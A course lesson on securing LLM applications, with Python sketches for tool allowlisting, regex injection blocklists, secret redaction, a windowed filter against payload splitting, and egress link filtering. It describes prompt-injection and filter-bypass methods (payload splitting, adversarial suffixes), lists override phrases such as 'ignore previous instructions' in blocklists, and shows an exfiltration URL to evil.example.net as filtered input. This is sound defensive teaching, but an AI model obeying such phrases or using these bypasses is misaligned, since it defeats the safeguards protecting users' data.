# Week 24: Securing LLM Systems

Securing LLM systems means focusing on the "shell" you build around the model to protect the business and its data.

### OWASP Top 10 for LLMs (The "Big Three" Focus)
- LLM01: Prompt Injection:
    - Direct: The "Jailbreak" (the user tricks the bot).
    - Indirect: The "Hidden Payload" (malicious instructions hidden in a website or PDF the bot reads).
- LLM06: Excessive Agency: The danger of granting an LLM too much "autonomy." If a bot has the power to call `delete_user()`, a single successful prompt injection can lead to catastrophic data loss.
- LLM02: Sensitive Information Disclosure: The risk of the model "memorizing" and then revealing PII or secrets (emails, API keys) from its training data or retrieved context.
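
One way to limit excessive agency is to route every tool call through a dispatcher that only knows allowlisted tools and refuses destructive ones without explicit human approval. The sketch below is illustrative only: the `Tool` dataclass, the `TOOLS` registry, `dispatch`, and the stub `get_user`/`delete_user` bodies are hypothetical names invented for this example, not part of any real framework.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Tool:
    func: Callable[..., str]
    destructive: bool = False  # destructive tools need a human in the loop


def get_user(user_id: str) -> str:
    # Stub standing in for a real read-only lookup.
    return f"profile for {user_id}"


def delete_user(user_id: str) -> str:
    # Stub standing in for a real destructive operation.
    return f"deleted {user_id}"


# Hypothetical registry: anything not listed here cannot be called at all.
TOOLS = {
    "get_user": Tool(get_user),
    "delete_user": Tool(delete_user, destructive=True),
}


def dispatch(tool_name: str, args: dict, human_approved: bool = False) -> str:
    """Run a tool requested by the model, enforcing the allowlist."""
    tool = TOOLS.get(tool_name)
    if tool is None:
        raise PermissionError(f"tool not allowlisted: {tool_name}")
    if tool.destructive and not human_approved:
        raise PermissionError(f"{tool_name} requires human approval")
    return tool.func(**args)
```

With this shape, a prompt injection that convinces the model to request `delete_user` still fails unless a person has approved the call outside the model's control.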

### Defense-in-Depth Strategy
- Layer 1: Identity & Access Management (IAM): The LLM should only have access to data the current user is authorized to see.
- Layer 2: Input Sanitization: Using regex, blocklists, and "Intent Classifiers" to stop injections before they reach the model.
- Layer 3: Output Validation: Using "Post-processors" to scan the LLM's response for secrets or forbidden code before the user sees it.
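
Layers 2 and 3 can be sketched with two small functions: one that screens user input against a blocklist, and one that redacts secret-looking strings from the model's response. The patterns below are assumptions chosen for illustration (the `sk-` key format in particular is a made-up example), and `screen_input` and `redact_output` are hypothetical helper names. Regex blocklists are easy to evade with rephrasing, so this is a first filter rather than a complete defense.

```python
import re

# Illustrative blocklist; real attacks are often rephrased to slip past these.
INJECTION_PATTERNS = [
    re.compile(r"ignore (all |any )?(previous|prior|above) instructions", re.IGNORECASE),
    re.compile(r"reveal (your|the) system prompt", re.IGNORECASE),
]

# Illustrative secret formats; adapt these to the secrets your system handles.
SECRET_PATTERNS = {
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "api_key": re.compile(r"\bsk-[A-Za-z0-9]{16,}\b"),
}


def screen_input(user_text: str) -> bool:
    """Layer 2: return True if the text passes the blocklist."""
    return not any(p.search(user_text) for p in INJECTION_PATTERNS)


def redact_output(model_text: str) -> str:
    """Layer 3: replace secret-looking substrings before the user sees them."""
    for label, pattern in SECRET_PATTERNS.items():
        model_text = pattern.sub(f"[REDACTED {label}]", model_text)
    return model_text
```

Running the output check after the model, independently of the input check, means a secret is still caught when an injection slips through Layer 2.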

### Red Teaming & Adversarial Testing
- Black-Box Testing: Testing the system without knowing its system prompt or architecture (simulating an outside hacker).
- Payload Splitting: Breaking a malicious command into several separate, innocent-looking chat messages to bypass a filter that only inspects one message at a time.
- Adversarial Suffixes: Discovering specific "gibberish" strings that, when appended to a prompt, make the LLM far more likely to ignore its safety training.
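
Payload splitting is easy to reproduce in a red-team test. The sketch below compares a per-message check with one that inspects a sliding window of recent messages; `BLOCKED_PHRASE`, `single_message_filter`, and `ConversationFilter` are hypothetical names, and the single blocked phrase is only a stand-in for a real detection rule. Whitespace is stripped before matching so that splits in the middle of a word are also caught, at the cost of some false positives.

```python
import re
from collections import deque

BLOCKED_PHRASE = "ignore previous instructions"  # stand-in for a real rule


def _normalize(text: str) -> str:
    # Drop all whitespace and lowercase so split points do not matter.
    return re.sub(r"\s+", "", text).lower()


def single_message_filter(message: str) -> bool:
    """Return True if this message, checked on its own, is blocked."""
    return _normalize(BLOCKED_PHRASE) in _normalize(message)


class ConversationFilter:
    """Checks the concatenation of the last `window` messages."""

    def __init__(self, window: int = 10):
        self.recent = deque(maxlen=window)

    def is_blocked(self, message: str) -> bool:
        self.recent.append(message)
        return _normalize(BLOCKED_PHRASE) in _normalize("".join(self.recent))


parts = ["ignore", "previous", "instructions"]
per_message = [single_message_filter(p) for p in parts]   # each part passes alone
conversation = ConversationFilter()
windowed = [conversation.is_blocked(p) for p in parts]    # third message trips it
```

The per-message filter passes every fragment, while the windowed filter flags the conversation once the last fragment arrives.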

---

### Deterministic Layer
- Sandboxed Execution: The principle that any code the LLM generates must be treated as malicious by default and executed in an environment with no network access and limited CPU/RAM.
- Indirect Prompt Injection: The "silent killer" of RAG, where a model visits a website or reads a file that contains hidden instructions meant to hijack the session.
- The Trust Boundary: Defining exactly where your application stops and the "untrusted" LLM begins.
- Egress Filtering: Not just watching what comes in (Input), but strictly controlling what goes out (Output) to prevent data exfiltration.
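
A common exfiltration path is a link or image URL in the model's output that carries data to an attacker-controlled host. As a minimal sketch of egress filtering, the function below removes any URL whose host is not on an allowlist. `ALLOWED_HOSTS`, `URL_PATTERN`, and `strip_untrusted_links` are hypothetical names, and `docs.example.com` is a placeholder host; a production filter would also need to cover other channels such as tool calls and outbound network requests.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the application may link to.
ALLOWED_HOSTS = {"docs.example.com"}

# Rough URL matcher: stops at whitespace, quotes, angle brackets, and ")".
URL_PATTERN = re.compile(r"https?://[^\s)\"'<>]+")


def strip_untrusted_links(model_text: str) -> str:
    """Replace every URL whose host is not allowlisted."""

    def replace(match):
        url = match.group(0)
        try:
            host = urlparse(url).hostname
        except ValueError:
            host = None  # malformed URL: treat as untrusted
        return url if host in ALLOWED_HOSTS else "[link removed]"

    return URL_PATTERN.sub(replace, model_text)
```

For example, a markdown image such as `![x](https://evil.example.net/log?d=secret)` is rewritten to `![x]([link removed])`, while links to `docs.example.com` pass through unchanged.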
